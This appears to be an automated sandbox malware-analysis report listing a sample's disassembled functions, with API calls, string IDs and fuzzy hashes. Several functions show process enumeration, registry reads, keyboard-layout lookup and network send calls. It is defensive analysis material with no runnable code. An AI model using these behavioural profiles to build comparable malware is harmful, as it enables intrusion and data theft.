                                • Instruction ID: 75a60bec03265776b93b53542ea819fdab521e44af267d44e1f719a945e8e2e2
                                • Opcode Fuzzy Hash: bc830042460a8b7e4f23ea146b673c7d23acc7bc4933b5c91394f116147f2234
                                • Instruction Fuzzy Hash: 5451D371A00704AFEB20DF6AC841B6673F4FF85729B14456EE819D7250E739EE01CB88
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00449365 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                                • _free.LIBCMT ref: 004493BD
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00449589
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction ID: c95a83c4fc9d8f5f381c6ef12c4bd90d50aad01b0883e3b7d6e96279f2ead045
                                • Opcode Fuzzy Hash: 0a3c6fbe7e5a1f133d1032b40f823fca6b3dff27f0c0d46b4efcd8c71cfe77a6
                                • Instruction Fuzzy Hash: 71511A71904205EBEB14EFA9DD819AFB7BCEF44324F10066FE51493291EB788E42DB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040F8FD Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 0041BFB7: GetCurrentProcess.KERNEL32(?,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFC8
                                  • Part of subcall function 0041BFB7: IsWow64Process.KERNEL32(00000000,?,?,0040DAAA,WinDir,00000000,00000000), ref: 0041BFCF
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F91B
                                • Process32FirstW.KERNEL32(00000000,?), ref: 0040F93F
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F94E
                                • CloseHandle.KERNEL32(00000000), ref: 0040FB05
                                  • Part of subcall function 0041BFE5: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,0040F5F9,00000000,?,?,00475338), ref: 0041BFFA
                                  • Part of subcall function 0041BFE5: IsWow64Process.KERNEL32(00000000,?,?,?,00475338), ref: 0041C005
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                  • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040FAF6
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$OpenProcess32$NextWow64$CloseCreateCurrentFirstHandleSnapshotToolhelp32
                                • String ID:
                                • API String ID: 2180151492-0
                                • Opcode ID: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                • Instruction ID: d179df5438ecf7187d550cf9263b6860c2801d48d571b2859f9d543a591e132f
                                • Opcode Fuzzy Hash: af739ac690ee8d07d81366b8be29f9ccbff63967b6472fc478213852870bed76
                                • Instruction Fuzzy Hash: 784116311083419BC325F722DC55AEFB3A5AF94345F50493EF48A921E2EF385A49C75A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00443DF9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction ID: 5dce3a056f7b38871bf3701478ebec2c01ef4ac0d1e4adeac0a27022f106ca0c
                                • Opcode Fuzzy Hash: f0d0e5395ad938097262dc5d88931f0578874cbbbca0d0094bbf983591b431c8
                                • Instruction Fuzzy Hash: 0741F536A012009FEB20DF78C881A5EB3F1EF89B14F2545AEE515EB341DB35AE01CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004126DB Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 93sleepCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                  • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                  • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                • Sleep.KERNEL32(00000BB8), ref: 0041277A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQuerySleepValue
                                • String ID: 8SG$exepath$hdF$Mw
                                • API String ID: 4119054056-3668720595
                                • Opcode ID: bfa7946a20d0ba0244eb19560f4c3b0d7a78169555de0d07121ed9ca0cce8570
                                • Instruction ID: f3cf03c5a64ef847c6da3637c810c9cb64e8e240b2c65477c235684d5dc29c85
                                • Opcode Fuzzy Hash: bfa7946a20d0ba0244eb19560f4c3b0d7a78169555de0d07121ed9ca0cce8570
                                • Instruction Fuzzy Hash: B52148A0B0030427DA00B7366D46EBF724E8B84318F40443FB916E72D3EEBC9C48426D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044F35A Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • GetEnvironmentStringsW.KERNEL32 ref: 0044F363
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044F386
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044F3AC
                                • _free.LIBCMT ref: 0044F3BF
                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044F3CE
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                • String ID:
                                • API String ID: 336800556-0
                                • Opcode ID: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                • Instruction ID: 8337c1946637dec1c7c9c61cb05458c13fbc509b7d73539ecc926bc10a2836fd
                                • Opcode Fuzzy Hash: d8ae35f0e3060a242d199930de563035f78cbeddf85e30d7e5766290ad92fb82
                                • Instruction Fuzzy Hash: 2301B173601755BB37211ABA5C8CC7F6A6CDAC6FA5315013FFD14C2202EA68CD0581B9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C3F1 Relevance: 7.6, APIs: 5, Instructions: 67fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000004,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,00000004,00000000,0041C510,00000000,00000000,00000000), ref: 0041C430
                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C44D
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C459
                                • WriteFile.KERNEL32(00000000,00000000,00000000,00406F85,00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C46A
                                • CloseHandle.KERNEL32(00000000,?,00000004,00000000,0041C510,00000000,00000000), ref: 0041C477
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreatePointerWrite
                                • String ID:
                                • API String ID: 1852769593-0
                                • Opcode ID: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction ID: 5cb8be75c3dc4c1e2f747800af3fbfd5a98fa41e64789a84fd548ad7506a8702
                                • Opcode Fuzzy Hash: c16bf2a5e476d7eb9c065cb57b6c83635d373e8a2041914a8f43a70e8d32cf2e
                                • Instruction Fuzzy Hash: B0110471288220FFEA104B24ACD9EFB739CEB46375F10462AF592C22C1C7259C81863A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00448299 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • GetLastError.KERNEL32(?,00000000,?,0043BC87,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0044829E
                                • _free.LIBCMT ref: 004482D3
                                • _free.LIBCMT ref: 004482FA
                                • SetLastError.KERNEL32(00000000), ref: 00448307
                                • SetLastError.KERNEL32(00000000), ref: 00448310
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$_free
                                • String ID:
                                • API String ID: 3170660625-0
                                • Opcode ID: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction ID: 817e1e76de570c2b023109a843fda652767a1b5a915d0172e9d2adf04509528a
                                • Opcode Fuzzy Hash: 3b5a676440ed160f08d3b9c67501060176d9d4d3bcfe02f134d94644f9898a15
                                • Instruction Fuzzy Hash: 5601F936500B0067F3112A2A5C8596F2559EBC2B7A735452FFD19A22D2EFADCC01816D
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041C1DD Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                Download Yara Rule
                                APIs
                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041C228
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseHandleOpen$FileImageName
                                • String ID:
                                • API String ID: 2951400881-0
                                • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 004509BC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 004509D4
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 004509E6
                                • _free.LIBCMT ref: 004509F8
                                • _free.LIBCMT ref: 00450A0A
                                • _free.LIBCMT ref: 00450A1C
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction ID: 8e1836d4b3683ea2f551dac33bf8b94159c93f8dbbc189607f67f5fa0db289e6
                                • Opcode Fuzzy Hash: 3215379f381551316c6ac489d477ac1f9e59373460363398d28d4bb450e902e5
                                • Instruction Fuzzy Hash: F3F04F76504600B79620EB5DE8C2C1B73D9EA0571A795891BF66CDB612CB38FCC0869C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00444048 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • _free.LIBCMT ref: 00444066
                                  • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                  • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                • _free.LIBCMT ref: 00444078
                                • _free.LIBCMT ref: 0044408B
                                • _free.LIBCMT ref: 0044409C
                                • _free.LIBCMT ref: 004440AD
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 776569668-0
                                • Opcode ID: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction ID: c4ed0220327abb1134bcf7d54e43c2409a3611c90002b0fe773cef56a7474a4d
                                • Opcode Fuzzy Hash: d22801927142449f45bafb541f3c6c05cfc56c6a25697691e9266b530bc09d46
                                • Instruction Fuzzy Hash: 11F03AB18009208FA631AF2DBD414053B61E705769346822BF62C62A70C7B94ED2CFCF
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044BA37 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: PkGNG
                                • API String ID: 0-263838557
                                • Opcode ID: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                • Instruction ID: 56b21f6c39f874414c878b072b89285690216c2d241c0ad811085e1835033e53
                                • Opcode Fuzzy Hash: 6a83c2428ddcf6ea71a3f14a315267ad78d224b448d93c685a7e270e7132f7c7
                                • Instruction Fuzzy Hash: 1B51B271D00249AAEF14DFA9C885FAFBBB8EF45314F14015FE400A7291DB78D901CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044E6E9 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                Download Yara Rule
                                APIs
                                • _strpbrk.LIBCMT ref: 0044E738
                                • _free.LIBCMT ref: 0044E855
                                  • Part of subcall function 0043BD19: IsProcessorFeaturePresent.KERNEL32(00000017,0043BCEB,?,?,?,?,?,00000000,?,?,0043BD0B,00000000,00000000,00000000,00000000,00000000), ref: 0043BD1B
                                  • Part of subcall function 0043BD19: GetCurrentProcess.KERNEL32(C0000417), ref: 0043BD3D
                                  • Part of subcall function 0043BD19: TerminateProcess.KERNEL32(00000000), ref: 0043BD44
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                • String ID: *?$.
                                • API String ID: 2812119850-3972193922
                                • Opcode ID: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction ID: 94a4b4bbf586d133b1ca6d09685756ea089c4dad0dcc4a5060c65dcbb11523ea
                                • Opcode Fuzzy Hash: 6703a85dd49711e1afab558f77f60869b6155e4f96c4351f2947c71862cae23b
                                • Instruction Fuzzy Hash: B951C375E00109EFEF14DFAAC881AAEBBB5FF58314F25816EE454E7301E6399E018B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00415AEA Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CountEventTick
                                • String ID: !D@$NG
                                • API String ID: 180926312-2721294649
                                • Opcode ID: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                • Instruction ID: 1740d3d485f2be3f914829e5aa2a54ae858af1ae40273f66f7ff2800e9d96298
                                • Opcode Fuzzy Hash: a5a641677daa38105cbe42e75e0e2883f17254e83355899c77695e5a9bf74507
                                • Instruction Fuzzy Hash: 7E51A1316083019AC724FB32D852AEF73A5AF94314F50493FF54A671E2EF3C5949C68A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00409EA3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 157COMMON
                                Download Yara Rule
                                APIs
                                • GetKeyboardLayoutNameA.USER32(?), ref: 00409ED3
                                  • Part of subcall function 004048C8: connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                  • Part of subcall function 0041C515: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,00409F5B,00474EE0,?,00474EE0,00000000,00474EE0,00000000), ref: 0041C52A
                                  • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_1m70ggeepT.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateFileKeyboardLayoutNameconnectsend
                                • String ID: (x$XQG$NG
                                • API String ID: 1634807452-1209448704
                                • Opcode ID: 3fb924593915bbdab49489ab510ca87b68c848884981a2accbe0ae65a1be58bc
                                • Instruction ID: e0ccbd324811511655e6ba18c086c0ffec884fa52ef92f7e14ea490dcf81b303
                                • Opcode Fuzzy Hash: 3fb924593915bbdab49489ab510ca87b68c848884981a2accbe0ae65a1be58bc
                                • Instruction Fuzzy Hash: BA5133315082415AC324F732D852AEFB3E5AFD4348F50493FF44A671E6EF78594AC649
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00442385 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                Download Yara Rule
                                APIs
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424DE
                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004424F3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1967304191.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1967291341.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967360265.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967379795.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1967405295.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
